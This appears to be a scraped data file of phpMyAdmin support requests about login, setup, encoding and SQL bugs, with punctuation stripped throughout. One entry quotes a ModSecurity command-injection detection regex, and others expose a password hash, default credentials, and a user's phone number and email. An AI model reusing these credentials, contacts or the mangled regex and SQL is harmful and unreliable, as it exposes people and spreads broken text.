[CDATA[ updates current settings if window.parent.setAll) \{ window.parent.setAll en utf 8 , utf8 unicode ci , 1 , vbulletin , user ); \} set current db, table and sql query in the querywindow if window.parent.refreshNavigation) \{ window.parent.reload querywindow vbulletin , user , SELECT username,field12 FROM user,userfield where user.userid=4810 and user.userid=userfield.userid ); \} set focus to the querywindow if parent.querywindow !parent.querywindow.closed parent.querywindow.location) \{ self.focus ); \} if window.parent.frame content) \{ reset content frame name, as querywindow needs to set a unique name before submitting form data, and navigation frame needs the original name if window.parent.frame content.name != frame content ) \{ window.parent.frame content.name = frame content ; \} if window.parent.frame content.id != frame content ) \{ window.parent.frame content.id = frame content ; \} window.parent.frame content.setAttribute name , frame content ); window.parent.frame content.setAttribute id , frame content ); \} ]] gt; lt; script gt; lt; body gt; lt; html gt; Original URL https sourceforge.net p phpmyadmin support requests 1005 https sourceforge.net p phpmyadmin support requests 1005 Original author spinball","bug"
"24444","2828","http authentication does not work on Windows XP SP2.
Unable to login using http authentication on Windows XP SP2 cookie auth works.
http auth worked for v2.7 something.
If I remember correctly I had to comment out these in a previous version for it to work, but that doesn t help either now cfg[ Servers ][ i][ controluser ] = pma ; cfg[ Servers ][ i][ controlpass ] = pmapass ; Running MySQL Server 3.23.49 with PHP 4.4.0 Just says incorrect login after 3 attempts.
Original URL https sourceforge.net p phpmyadmin support requests 1006 https sourceforge.net p phpmyadmin support requests 1006 Original author merc444","bug"
"24444","2829","setup.php does not work.
scripts setup.php does nothing, no matter what button I press.
Original URL https sourceforge.net p phpmyadmin support requests 1007 https sourceforge.net p phpmyadmin support requests 1007 Original author spintz26","bug"
"24444","2830","Drop table does not work.
When trying to Drop table, it tries to execute SQL SELECT FROM Which of course is not valid, and is especially far from the DROP TABLE command!!!
Original URL https sourceforge.net p phpmyadmin support requests 1008 https sourceforge.net p phpmyadmin support requests 1008 Original author spintz26","bug"
"24444","2831","Can t add table to database.
I have created a database called filestore.
I try to add a table files with 5 fields and after clicking OK, I get an error The field count is empty!
Original URL https sourceforge.net p phpmyadmin support requests 1009 https sourceforge.net p phpmyadmin support requests 1009 Original author spintz26","bug"
"24444","2832","designer coords config variable.
I just updated PMA from 2.9.1 to 2.11.0.
When I tried to do operations on a database I got the message that features for working with linked tables were disabled because the config variable cfg[ Servers ][ i][ designer coords ] was not OK .
I added it to my config file and kept the default setting at pma designer coords.
I ran the script to update the tables, adding the pma designer coords table.
I have checked and re checked this, tried different browsers, different computers, but I can t get rid of this error.
I can see by browsing the database that the new pma designer coords table exists, and the config variable is definitely present in the file.
What s wrong?
System is OS X Server 10.4.10, MySQL 4.1.22, PHP 4.4.4 Original URL https sourceforge.net p phpmyadmin support requests 1052 https sourceforge.net p phpmyadmin support requests 1052 Original author groblewis","bug"
"24444","2833","Export CSV Problem.
We use open double quote hex 0x93 and close quote hex )x94 in a varchar field.
These field import properly and display properly.
When I export csv) they display properly on the screen, but when written to a file 0x93 translates to 0xC2 0x80 0x9C and 0x94 translates to 0xC2 0x80 0x9D.
I have set the save dir and written the file to the server, but still get the same result.
Your assistance would be greatly appreciated.
Best Regards, Original URL https sourceforge.net p phpmyadmin support requests 1011 https sourceforge.net p phpmyadmin support requests 1011 Original author fredrickbrown Found in version 2.6.3 rc1","bug"
"24444","2834","Can t copy tables with an underscore ).
Tables, who s table name has an underscore e.g.
forums seq ) cannot be copied, because the following invalid SQL code is generated CREATE TABLE `jdeforen`.`deeska2 seq` `seq` char 1 ) NOT NULL default , `nextval` bigint 20 ) unsigned NOT NULL AUTO INCREMENT , PRIMARY KEY `seq` ) , KEY `nextval` `nextval` ) ) ENGINE = MYISAM AUTO INCREMENT = 659122DEFAULT CHARSET = latin1 Original URL https sourceforge.net p phpmyadmin support requests 1012 https sourceforge.net p phpmyadmin support requests 1012 Original author jesusparty","bug"
"24444","2835","Would not recognise config file.
After uploading everything and following instructions to chmod config directory and then run scripts setup.php, I successfully got the thing to write to the config.inc.php I had a look in this file and everything seemed correct, however once I copied it to the main directory, then tried to use pma, I got the error Access denied for root localhost even though I had set my username and password AND had hit save on the configuration section.
My mysql username and password were clearly in the config.inc.php in the right places, however if I then went back to scripts setup.php, none of the server info was there and I d have to add it again.
Original URL https sourceforge.net p phpmyadmin support requests 1013 https sourceforge.net p phpmyadmin support requests 1013 Original author mlmforcash","bug"
"24444","2836","Getting 406 error The resource cannot be displayed.
Hi, I keep getting HTML 406 Not acceptable ) errors when trying to use this version of pma.
I am using IE 6.0.2900.2180.xpsp sp2 gdr.050301 1519 I have never had this problem in pma 2.9.1.1 I can start to browse any table, by click on the left hand menu, but as soon as I try to go to the next page, or click to edit a row, I just get the 406 error in the right hand frame.
Original URL https sourceforge.net p phpmyadmin support requests 1014 https sourceforge.net p phpmyadmin support requests 1014 Original author mlmforcash","bug"
"24444","2837","Incredibly slow phpmyadmin.
Hey, I have successfully installed phpmyadmin on my server, and everything works perfect.
Except for one thing, it is sooooo slow.
It takes a couple of seconds for each page to load within phpmyadmin, but when I use mySQL outside of phpmyadmin, everything works flawlessly!
What might be wrong ?
The server is not very fast 2.8GHz, 1GB RAM) but it works fine in every other way.
Please help me!
Regards Herman Original URL https sourceforge.net p phpmyadmin support requests 1016 https sourceforge.net p phpmyadmin support requests 1016 Original author ptba Found in version Latest Git","bug"
"24444","2838","PMA availableDatabases undefined.
PMA availableDatabases is undefined in common.lib.php and is called from left.php using older configuration file php 5 mysql 5 phpmyadmin 2.10.0.2 Original URL https sourceforge.net p phpmyadmin support requests 1017 https sourceforge.net p phpmyadmin support requests 1017 Original author liorsion","bug"
"24444","2839","Need Help Fast!.
Need help fast.
The guy who built our corporate website quit and went with another company.
He is the only one who knew or had a password for phpMyAdmin.
He built a content management system to post news articles on our website, but the thing posts the earliest dates first instead of the latest dates, which would be the most recent articles.
So it works backwards.
I have two questions.
How can I get into phpMyAdmin?
No one from the web design firm of the guy who built this knows where he is or how to get a hold of him.
If I can get in there somehow, how do I fix the date thing so it works properly without screwing up the rest of the site?
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1018 https sourceforge.net p phpmyadmin support requests 1018 Original author dws530 Found in version 2.6.0 pl2","bug"
"24444","2840","Can t view tables named with this pattern.
I ve tried this on two servers with different recent version of phpMyAdmin.
When I try to view the schema or browse the data in any table named t ads , nothing happens.
The browser firefox 2) will not load the page, the old page continues to display.
If I choose Open in new window , my browser opens the link in a new window and display the correct page.
This does not happen with any of the other tables on my server.
Here is a sample CREATE TABLE `t ads acc` `acc id` int 11) unsigned NOT NULL auto increment, `usr id` int 11) unsigned NOT NULL default 0 , `acc name` varchar 250) NOT NULL default , `acc key` varchar 250) NOT NULL default , `acc email` varchar 250) NOT NULL default , `acc password` varchar 250) NOT NULL default , PRIMARY KEY `acc id`), KEY `usr id` `usr id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT= Accounts AUTO INCREMENT=31 ; Thanks!
Erik Original URL https sourceforge.net p phpmyadmin support requests 1019 https sourceforge.net p phpmyadmin support requests 1019 Original author erikcw","bug"
"24444","2841","phpMyAdmin 2.7.0 pl2 user manual request.
First time on sourceforge.net I just updated a web site and the host company is using phpMyAdmin 2.7.0 pl2 on their new servers.
I was used to 2.5.7 and am having some problems trying to figure out how to import tab delimited files via the new Import options.
I m also getting SQL errors when attempting simple procedures like Copy table via Operations.
Is there a user manual anywhere that I can refer to?
I ve looked through the sourceforge site and haven t had any luck.
Is it possible to import import tab delimited files in 2.7.0?
If so, what options do I select for Character set CSV or CSV using LOAD DATA Fields terminated Column names do I have to fill this in?
Any help insight from anyone would be greatly appreciated.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1020 https sourceforge.net p phpmyadmin support requests 1020 Original author mtviens","bug"
"24444","2842","Which file to use to upgrade.
What is the exact difference between the differnent language files that are avaialble.
For example, I am using WAMP5 and I want to upgrade phpMyAdmin.
There are three upgrade download files available phpMyAdmin 2.11.2 english.zip, and phpMyAdmin 2.11.2 all languages utf 8 only.zip, and phpMyAdmin 2.11.2 all languages.zip).
In other words, which phpMyAdmin version is the one used in WAMP5?
Does it matter which file I use?
Are the files identical except for the contents of the lang directory?
Can I just delete the entire contents of my lang directory except for the single language file I wish to use?
Original URL https sourceforge.net p phpmyadmin support requests 1062 https sourceforge.net p phpmyadmin support requests 1062 Original author svanslyck","bug"
"24444","2843","phpMyAdmin 2.7.0 pl2 user manual request.
First time on sourceforge.net I just updated a web site and the host company is using phpMyAdmin 2.7.0 pl2 on their new servers.
I was used to 2.5.7 and am having some problems trying to figure out how to import tab delimited files via the new Import options.
I m also getting SQL errors when attempting simple procedures like Copy table via Operations.
Is there a user manual anywhere that I can refer to?
I ve looked through the sourceforge site and haven t had any luck.
Is it possible to import import tab delimited files in 2.7.0?
If so, what options do I select for Character set CSV or CSV using LOAD DATA Fields terminated Column names do I have to fill this in?
Any help insight from anyone would be greatly appreciated.
Thanks.
Original URL https sourceforge.net p phpmyadmin support requests 1021 https sourceforge.net p phpmyadmin support requests 1021 Original author mtviens","bug"
"24444","2844","no reaction to sql query blank form).
I click the SQL tab from phpMyAdmin, and enter the query listed below.
When I press Go , the page just refreshes and blanks out the SQL form, but gives no result set and no error message.
Very curious.
The query does work using the mysql command line client, and produces the expected result.
OS Mac OS X 10.4.9 Browsers Safari 2.0.4 and FIrefox 2.0.0.3 MySQL 5.0.21 phpMyAdmin 2.10.0.2 and 2.8.0.4 The query SELECT rnd.sel round, COUNT DISTINCT sel.pdb id) AS uniq pdbs FROM sel pdbs sel, SELECT DISTINCT sel round FROM sel pdbs ) rnd WHERE sel.sel round lt;= rnd.sel round GROUP BY rnd.sel round The table looks like this CREATE TABLE `sel pdbs` `book id` varchar 16) NOT NULL default , `pdb id` char 4) NOT NULL default , `sel round` bigint 1) NOT NULL default 0 , PRIMARY KEY `book id`,`pdb id`), KEY `pdb id` `pdb id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 The object of this query is to show how many distinc pdb id s are selected in the first round, first two rounds, etc.
of selection, if that helps any.
It works as expected in the command line client.
Please feel free to contact me at iwd32900 at yahoo dot com for any further information.
Original URL https sourceforge.net p phpmyadmin support requests 1022 https sourceforge.net p phpmyadmin support requests 1022 Original author ian davis","bug"
"24444","2845","Non existing entry shown in privileges?.
Hi, mysql gt; select host, user, password from mysql.user; | host | user | password | | localhost | root | | | debian | root | | | 127.0.0.1 | root | | | localhost | debian sys maint | 6238EB225D5263966E04E1FAD09B5F3A65EAC130 | 4 rows in set 0.00 sec) However, phpMyAdmin Privileges also shows User Elke each all) Host Password Privileges USAGE Grant Nee Original URL https sourceforge.net p phpmyadmin support requests 1064 https sourceforge.net p phpmyadmin support requests 1064 Original author olafvdspek","bug"
"24444","2846","Can t run any SQL or browse tables.
Hi, I have a trouble running any SQL on my phpmyadmin install on a Win2003 32bit) server.
apache 2, namevhost) I installed apache using the rails prod win package, and since I have a site on production on this host, I can t just remove and reinstall apache.
I asked on the forum and we tried various thing but nothing worked.
https sourceforge.net forum message.php?msg id=4230873 I tried to install 2.11 trunk) from http cihar.com phpMyAdmin snapshots but I experience the same problem the server drop the connection on that line... PMA SQP parse sql query); phpmyadmin 2.9.2 sql.php line 140) now I believe it might be a bug in the code.
I tried to read the PMA SQP parse but I gave up, the function is like 500 lines long with bunch of break continue, sorry.
please help.
Original URL https sourceforge.net p phpmyadmin support requests 1023 https sourceforge.net p phpmyadmin support requests 1023 Original author somekool Found in version Latest Git snapshot","bug"
"24444","2847","Weird insert results for INT fields.
My database has a few tables, all using InnoDB MySQL 4.1.22 on OS X Server 10.4.9).
Trying to insert records in an empty table with PMA.
2 columns have field type INT 10) UNSIGNED.
But the PMA record insertion form shows, instead of a field to type a number, a popup menu offering the following value choices from top to bottom) lt;empty gt; simply a blank entry) 5 4 3 2 1 lt;empty gt; lt;empty gt; 1 2 3 4 5 What on earth is going on here?
Possible clues both of these columns have indexes and foreign key declarations.
The table they point to has 5 rows.
Its key field is also INT 10) UNSIGNED.
Original URL https sourceforge.net p phpmyadmin support requests 1024 https sourceforge.net p phpmyadmin support requests 1024 Original author roblewis","bug"
"24444","2848","Multiple User Environment.
i am having problems with setting up a multiple user environment.
since i am an ISP it is very important for me to have this set up.
the problem i am having is that i cant figure out any way to get a user account to only see his her database while at the same time allowing to create new databases and deleting them just as if they are the are the owner of there own part of the database.
for example he has full power over what he creates but cant see whatever other people have created in there accounts.
can you help me.
Original URL https sourceforge.net p phpmyadmin support requests 1025 https sourceforge.net p phpmyadmin support requests 1025 Original author fchavez09 Found in version Latest Git","bug"
"24444","2849","Wrong Mysql Client Version.
Most peculiar, my install of PMA 2.11.4), running on PHP 5.2.5 with MySQL 5.0.45 on a CentOS box RH EL variant) is not showing the correct mysql client version number, nor does it think it can load the mysqli lib, even though mysqli is installed just fine and works when asked to.
Screenshot PNG) attached Details PMA s config.inc.php is set to use mysqli, since that is appropriate for my version numbers phpinfo ) reveals .
configure line to include a properly formatted and correct with mysqli=blahblah clause phpinfo ) reveals normal looking mysql and mysqli detail sections a test page I put together reveals that mysqli works just fine when called to connect to a DB the same test page contains an echo of 2 functions mysql get client info ) and mysqli get client info ) ...and both show 5.0.45, exactly as they should, since that is indeed the installed version and what PHP was compiled against.
HOWEVER... the main PMA 2.11.4 page shows that it thinks it cannot load the mysqli extension, and is showing a mysql client lib of 4.1.22.
I m not sure how PMA got that version number, as 4.1.22 has NEVER been installed on this box at all.
So, the question is this if phpinfo shows client=5.0.45, and phpinfo shows mysqli working, and test pages show the same, how come PMA is showing some old client version and not loading the mysqli lib?
Shouldn t PMA be getting the exact same info available to phpinfo and related functions?
Addenda using PMA 3 dev resolves the issue, though I have other issues to report with PMA 3 dev.
Original URL https sourceforge.net p phpmyadmin support requests 1070 https sourceforge.net p phpmyadmin support requests 1070 Original author kriscj","bug"
"24444","2850","No edit without PK when using selection criteria.
Go to search screen and select several fields to display BUT NOT the primary key.
Do not display the PK.
Also, you MUST select some kind of criteria on the query by example fields.
You will get some records displayed.
Edit one via the icon.
Up comes the edit screen, so make some kind of a change.
Then click go .
The edit will NOT take.
However, if you do NOT make a criteria QBE) choice, everything works fine.
If you do all the above BUT also include the PK, everything is OK.
It only screws up when you don t choose the PK to dispaly AND you make a query by exemple selection.
Al Original URL https sourceforge.net p phpmyadmin support requests 1027 https sourceforge.net p phpmyadmin support requests 1027 Original author al1776","bug"
"24444","2851","Trouble with phpmyadmin.
Hi everyone ) Cool Forum.
I m trying to install Apache, MySQL, PHP and phpmyadmin so that I can install MediaWiki on my windows xp machine.
I used this tutorial http www.wikihow.com Install phpMyAdmin on Your Windows PC )and installed Apache, MySQL PHP successfully.
The test PHP showed up under... http localhost phpinfo.php When I got to the phpmyadmin install I noticed that under c \server\ there was not a folder for apache2 but that the htdocs folder was there.
So I unzipped phpmyadmin to the phpmyadmin folder that I created) and tried to go to http localhost phpmyadmin index.php but it did not appear in firefox or explorer).
So...
I followed on and changed the config.inc.php according the tutorials specs but http localhost phpmyadmin index.php just was a white page.
No errors or page can not be displayed.
Anyone out there have any advice?
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 1029 https sourceforge.net p phpmyadmin support requests 1029 Original author joemad","bug"
"24444","2852","Navigation Problem.
When trying to browse through database, navigation gone, as error can t open left.php.
In order to avoud i had to copy navigation.php to same folder as left.php.
This error happend, when i attempted to use clean instalation.
Original URL https sourceforge.net p phpmyadmin support requests 1031 https sourceforge.net p phpmyadmin support requests 1031 Original author bsaksida","bug"
"24444","2853","broken cookie login in multiserver configuration again.
there is login problem again, when using multiple servers and cookie authentication.
can t login to other then first server in the select box.
please do not release untested version or do not make same bugs again and again.
it s not funny config.inc.php attached.
Original URL https sourceforge.net p phpmyadmin support requests 1032 https sourceforge.net p phpmyadmin support requests 1032 Original author airtom","bug"
"24444","2854","NULL values changes to empty string.
First detected the problem when I change some information in a row in a table.
As soon as you select a input field to edit all the checkboxes that show that one value is set to NULL are cleared.
And even if you only have one value that is NULL, and you make sure to check the checkbox it clears as soon as you click the submit button.
I then tried to insert an new row, but same result.
All the checkboxes cleard.
Have tried on serveral servers, running both MySQL 5.0.x and MySQL 4.1.x.
Same problem on every installation.
So, my suggestion is that there is a bug in the code.
marcus Original URL https sourceforge.net p phpmyadmin support requests 1033 https sourceforge.net p phpmyadmin support requests 1033 Original author farrington75","bug"
"24444","2855","phpmyadmin ALMOST works.
Hi I have installed PhP5.0 with mysqli, mysql, mbstring extensions) MySQl 5 on IIS Finally phpMyAdmin 2.10.
My problems are when i try and access the php page for myphpadmin index.php) I am met with php error in red then when I press refresh am taken to a basic mpa screen.
I am able to to view all my databases but not make any changes ie not even change the theme of the control panel).
I have changed the config.default file to add mysql password which has atleast allowed me to login.
I feel I am almost there but am sure I have missed something quite basic.
Any ideas?
Ravster73 Original URL https sourceforge.net p phpmyadmin support requests 1034 https sourceforge.net p phpmyadmin support requests 1034 Original author ravster73 Found in version Latest Git","bug"
"24444","2856","Spam Messages In Guest book.
I am curren using MySQL 4.1.16 standard log and phpMyAdmin 2.8.2.4.
My problem is that every couple of hours on my guest there are messages or ads for viaga and things are not related to my site and i wanted to know how can u block the html coding from those message or block user who try to post up html coding.
also i my php site to show 30 lines but it only shows onw guest book entry at a time i have to delete the first one to see the next message on mysql and on my web site.
i am hoping that someone can help via the phon and step by step so i know what i am doing my number is 909) 322 1983 thank you Original URL https sourceforge.net p phpmyadmin support requests 1035 https sourceforge.net p phpmyadmin support requests 1035 Original author premo Found in version 2.8.2.2","bug"
"24444","2857","2.10.1) missing enable upload state of Config class.
Hi, I ve encountered problem with file upload on import.
However I had file uploads set to On, turned off safe mode and correct cfg[ UploadDir ] I still saw File uploads are not allowed on this server.
on import tab.
This was with phpMyAdmin 2.10.1, PHP 5.2.3.
I crawled files and found that GLOBALS[ is upload ] was empty, because of enable upload variable was not set see function enableBc ) in Config.class.php).
Then I just added checkSystem ) call above that, and it started to work.
So at me this looks like that now function enableBc ) \{ this gt;checkSystem ); GLOBALS[ cfg ] = this gt;settings; GLOBALS[ default server ] = this gt;default server; ...) \} However I m not sure if this is a correct patch, because I don t know full files structure of phpMyAdmin.
Maybe there is some other, better way to fix that.
Original URL https sourceforge.net p phpmyadmin support requests 1036 https sourceforge.net p phpmyadmin support requests 1036 Original author pfurman","bug"
"24444","2858","Input size too small.
If you want to edit a table row te generated input field size is always set to 4, this started happening in version PhpMyAdmin 2.10.1 Only for field types resulting in a textarea input the size is set to a workable number of rows and columns, it even follows the given parameters in config.inc.php.
Original URL https sourceforge.net p phpmyadmin support requests 1037 https sourceforge.net p phpmyadmin support requests 1037 Original author ncnrick","bug"
"24444","2859","Lost Password.
I have made an password in phpmyadmin but i forgot it how do i get it back?
Original URL https sourceforge.net p phpmyadmin support requests 1038 https sourceforge.net p phpmyadmin support requests 1038 Original author chrbarrol","bug"
"24444","2860","HELP!!.
I have wampserver and it s giving me this error!
Your configuration file contains settings root with no password) that correspond to the default MySQL privileged account.
Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.
I put a password on it then I try going back to phpmyadmin and from there on out it will deny me giving me error 10054 please help!
e mail me chillbuds revenge hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 1039 https sourceforge.net p phpmyadmin support requests 1039 Original author chill bud","bug"
"24444","2861","permission to access tbl change.php?.
I have a table called textlinks.
If I try to edit a record after selecting browse) I get Forbidden You don t have permission to access admin phpMyAdmin 2.10.2 tbl change.php on this server.
However, if I select the same record check box) and then click on the chnge symbol at the end of the following line Check All Uncheck All With selected I can edit the record!?
Seems to be the only table this is happening to.
I have checked , repaired , optimised etc to no avail.
I have exported the record and reimported the structure and data as another table and it still happens !?)
The structure is as follows Table structure for table `textlinks` CREATE TABLE `textlinks` `text` varchar 50) NOT NULL default , `link` varchar 100) NOT NULL default , `replace` varchar 50) NOT NULL default , PRIMARY KEY `text`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Have I used a reserved word perhaps?
Original URL https sourceforge.net p phpmyadmin support requests 1040 https sourceforge.net p phpmyadmin support requests 1040 Original author stevecook","bug"
"24444","2862","Apache 2.2.4 with ModSecurity 2.1.
I have installed phpMyAdmin 2.10.2 on a Linux box running ModSecurity for Apache 2.1.1 configured Apache 2.2.4 Unix) PHP 5.2.3 0.dotdeb.1 with Suhosin Patch mod ssl 2.2.3 OpenSSL 0.9.8c configured Within ModSecurity the default rules are activated.
When I want to modify or delete a dataset from a table ModSecurity intercepts the GET Request complaining that the request is trying to inject a system command.
See the message [Wed Jul 04 08 38 23 2007] [error] [client 1.2.3.4] ModSecurity Access denied with code 501 phase 2).
Pattern match ?
\\\\b ?
?
n ?
et ?
\\\\b\\\\W ?\\\\blocalgroup|\\\\.exe)| ?
map|c)\\\\.exe)|t ?
racer ?
oute|t)|elnet\\\\.exe|clsh8?|ftp)| ?
w ?
guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W ?\\\\by )\\\\b|c ?
md ?
?
32)?\\\\.exe\\\\b|\\\\b\\\\W ?\\\\ c)|d ?
\\\\b\\\\W ?
[\\\\\\\\ ]|\\\\W ?\\\\.\\\\.)|hmod.\{0,40\}?
... at ARGS sql query.
[id 950006 ] [msg System Command Injection.
Matched signature lt;`.`id gt; ] [severity CRITICAL ] [hostname ab.mydomain.com ] [uri phpmyadmin sql.php?db=customer table=MYTABLE USER token=39a31beb897025cf8ce2ce4cf49237d1 pos=0 session max rows=30 disp direction=horizontal repeat cells=100 dontlimitchars=0 sql query=DELETE FROM 60MYTABLE USER 60 WHERE 60MYTABLE USER 60.
60ID 60 3D 13 LIMIT 1 zero rows=Die Zeile wurde gel C3 B6scht.
goto=sql.php 3Fdb 3Dcustomer 26table 3DMYTABLE USER 26token 3D39a31beb897025cf8ce2ce4cf49237d1 26pos 3D0 26session max rows 3D30 26disp direction 3Dhorizontal 26repeat cells 3D100 26dontlimitchars 3D0 26sql query 3DSELECT 2B 252A 2BFROM 2B 2560MYTABLE USER 2560 26zero rows 3DDie 2BZeile 2Bwurde 2Bgel 25C3 25B6scht.
26goto 3Dtbl structure.php is js confirmed=1 ] [unique id TwCDQ04v2p0AAH5OBnUAAAAG ] We do not want to shutdown ModSecurity, because it has often protect our system from foreign attacks.
Our own php programs are working fine, since we adopted it to ModSecurity issues.
The question is Could you give a hint how to work around this problem in phpMyAdmin or can you modify this in the phpMyAdmin coding.
ModSecurity will be used more and more in the future by most sites, so it would be fine that phpMyAdmin will work on those systems without modification.
Thank you!
Original URL https sourceforge.net p phpmyadmin support requests 1042 https sourceforge.net p phpmyadmin support requests 1042 Original author barrelshifter Found in version Latest Git","bug"
"24444","2863","lack of connection charset UTF 8) documentation.
Please, see my comment on 887183.
In addition I can add, that the mySql version is 5.0.45 and the following config items are in my config.inc.php file cfg[ DefaultLang ] = en utf 8 ; cfg[ DefaultConnectionCollation ] = utf8 unicode ci ; cfg[ FilterLanguages ] = ; cfg[ DefaultCharset ] = utf 8 ; cfg[ AllowAnywhereRecoding ] = TRUE; Data enter the database as UTF 8 data perfectly OK when not using phpMyAdmin Original URL https sourceforge.net p phpmyadmin support requests 1089 https sourceforge.net p phpmyadmin support requests 1089 Original author joergent Found in version Latest Git","bug"
"24444","2864","Updating Help with phpTriad...
I am running php triad 2.2.1, it automatically installed PMA 2.2.3, now i want to update the PMA to 2.10.
Someone please tell me how to update it so that the latest version works with phptriad... Thanx.
Original URL https sourceforge.net p phpmyadmin support requests 1044 https sourceforge.net p phpmyadmin support requests 1044 Original author rey619","bug"
"24444","2865","Cannot create table due to number of fields.
I am using MySQL 5.0, PHP5, IIS server on XP Pro.
I have no problem creating database using phpmyadmin, but have problem creating a table.
I did put a number in the text box of number of fields and click on GO .
But it says my number of fields textbox is empty.
I really do not know why it says its empty.
However, i can create table using MySQL Client.
SO, it seems that phpmyadmin has some errors.
In addition, i tried putting SQL create table query into phpmyadmin, but it did not work as well.
The error is as follows import.php Missing parameter import type FAQ 2.8) import.php Missing parameter format FAQ 2.8) Original URL https sourceforge.net p phpmyadmin support requests 1045 https sourceforge.net p phpmyadmin support requests 1045 Original author huiling25","bug"
"24444","2866","Segmentation Faults?.
Tried installing the available port on FreeBSD) and grabbed the lasted stable download 2.10.3) extracted the files, setup apache to redirect this is working fine) created the config folder and set the perms all i am getting is a blank page, both for phpmyadmin and scripts setup.php query my error log, and it is saying segmentation faults 11) freebsd support didint have any advice well the IRC channel on freenode) using php v 5.1.6 apache 1.3 with mod php mod perl and some other bits and near enough latest freebsd installed the other day) mysql 5.1 Barry Carlyon Original URL https sourceforge.net p phpmyadmin support requests 1046 https sourceforge.net p phpmyadmin support requests 1046 Original author barrycarlyon","bug"
"24444","2867","need help with data.
hi when I insert some data into my database in arabic language and view it using phpmyadmin and my website it appears like this ???????????????
.
any way to solve this problem?
and view the data in arabic not note I set the collection value to UTF8 unicode.
thanks in advance Original URL https sourceforge.net p phpmyadmin support requests 1096 https sourceforge.net p phpmyadmin support requests 1096 Original author salh zmzm","bug"
"24444","2868","get magic quotes gpc ).
Call to undefined function get magic quotes gpc ) when using phpmyadmin with PHP6.
That function according with authors, do not exist anymore in php6, so it should be changed the code in line 2812 if i recall correcly) in common.lib.php Original URL https sourceforge.net p phpmyadmin support requests 1047 https sourceforge.net p phpmyadmin support requests 1047 Original author lanzagabriele Found in version Latest Git snapshot","bug"
"24444","2869","import encoding problems.
i m having trouble importing an export for mysql4 into mysql5, I m using export import functions in phpmyadmin, when I import I get a few errors that I can t seem to sort out.
first of all, at the top of the page, I get three of these Warning mb strpos ) [function.mb strpos] Unknown encoding or conversion error.
in usr share phpmyadmin libraries string.lib.php on line 112 second, I get a mysql error that says 1062 Duplicate entry sp for key 1 which probably happens from the encoding conversion it allows me to click Browse for the error, but the browse tries to select from a table that doesn t exist I m using a stock debian etch s libapache mod php5, php5 cli, php5 common, php5 gd, php5 mysql, on a freshly installed machine.
I tried the latest phpmyadmin 2.10.3),k but got the same errors.
When I do the import I select UTF8 and mysql compatability mode MYSQL40.
If I choose latin1 the import goes fine, but then the character encodings are messed up on the site for example smart quotes).
The phpmyadmin import process doesn t tell me what lines they are in the dump, if I knew what they were I d inspect those lines and perhaps correct them.
I cant seem to reliably move a mysql40 database to mysql50 and preserve the character encoding, everything I ve tried fails.
Original URL https sourceforge.net p phpmyadmin support requests 1048 https sourceforge.net p phpmyadmin support requests 1048 Original author zygut","bug"
"24444","2870","Exporting Database from phpminadmin to phpmyadmin.
I have a database in phpminadmin.
I would like to transfer the database to phpmyadmin on a server where phpminadmin is not installed.
How do i export database from phpminadmin.
I am clicking on the database name on the phpminadmin panel, than i am clicking on dump, than it shows the database name on the top and list of tables below the database name.
In front of the database name skip is selected and below in all the tables, drop, create is selected.
I dont want to delete the database.
I want to download the whole database with all the tables, what should i click to download the whole database.
I would be import the database into the phpmyadmin using the shell command, or using the bigdump script.
Would be happy to receive a resolution to this matter.
Thanx Original URL https sourceforge.net p phpmyadmin support requests 1098 https sourceforge.net p phpmyadmin support requests 1098 Original author mumbaifans","bug"
"24444","2871","Add SET AUTOCOMMIT=1 after export with transactions.
PhpMyAdmin doesn t execute SQL queries after transactions How to repeat 1) Copy paste this example SQL into SQL window phpmyadmin tbl sql.php?db=abeo jan mazanek test table=test server=16 ) START SET FOREIGN KEY CHECKS=0; SET AUTOCOMMIT=0; START TRANSACTION; CREATE TABLE `test` `Test Code` varchar 255) character set ascii NOT NULL default , PRIMARY KEY `Test Code`) ) ENGINE=InnoDB; SET FOREIGN KEY CHECKS=1; COMMIT; INSERT INTO test Test Code) VALUES test ); END 2) Verify that record with value test is present in TABLE `test`.
In our tests under 4.0.27 and MySQL 5.0.x record was missing.
This is considered as PHPMyAdmin bug for us Original czech description of problem Problem Pokud vykonxc3xa1vxc3xa1m v phpmyadmin 2.10.2) sadu dotazxc5xaf kde xc4x8dxc3xa1st je uzavxc5x99enxc3xa1 v transakci, po txc3xa9to transakci nxc3xa1sledujxc3xad nxc4x9bjakxc3xa9 inserty, tak tyto se NEPROVEDOU pokud nenxc3xa1sleduje nxc4x9bjakxc3xa1 dalxc5xa1xc3xad transakce.
xc5x98exc5xa1enxc3xad obejitxc3xad problxc3xa9mu s PHPMyAdminem) Na konec vykonxc3xa1vanxc3xa9 sady dotazxc5xaf pxc5x99idat klauzuli COMMIT; Ve vxc3xbdxc5xa1e uvedenxc3xa9m pxc5x99xc3xadkladu se neprovede insert do tabulky test.
Original URL https sourceforge.net p phpmyadmin support requests 1049 https sourceforge.net p phpmyadmin support requests 1049 Original author jamaz007","bug"
"24444","2872","error Cannot start session without errors.
I cannot go and setup phpmyadmin by this error .
when I try to go to index.ph i see phpMyAdmin Error Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
and when I try to go scripts setup.php I see these 2 lines in button of page Warning open tmp\sess 2941d38400a862eaedcdbfd43db513e1, O RDWR) failed No such file or directory 2) in Unknown on line 0 Warning Failed to write session data files).
Please verify that the current setting of session.save path is correct tmp) in Unknown on line 0 Original URL https sourceforge.net p phpmyadmin support requests 1050 https sourceforge.net p phpmyadmin support requests 1050 Original author ddk847 Found in version Latest Git","bug"
"24444","2873","Prvleges Backslash in db name in dropdown.
phpMyAdmin 2.11.0 mySQL 5.0.45 utf 8 Table names like information schema, and web common have and added backslash in the dropdown when you try to add privleges to specific db s. These databases in particular were an import.
So I tested this also by creating a hello world db, getting same results.
I m not sure if this actually creates an operational problem, but I think it does because I m having some permission issues.
Screenie attached Original URL https sourceforge.net p phpmyadmin support requests 1051 https sourceforge.net p phpmyadmin support requests 1051 Original author hotestimator","bug"
"24444","2874","Operations Copy Table Auto Increment.
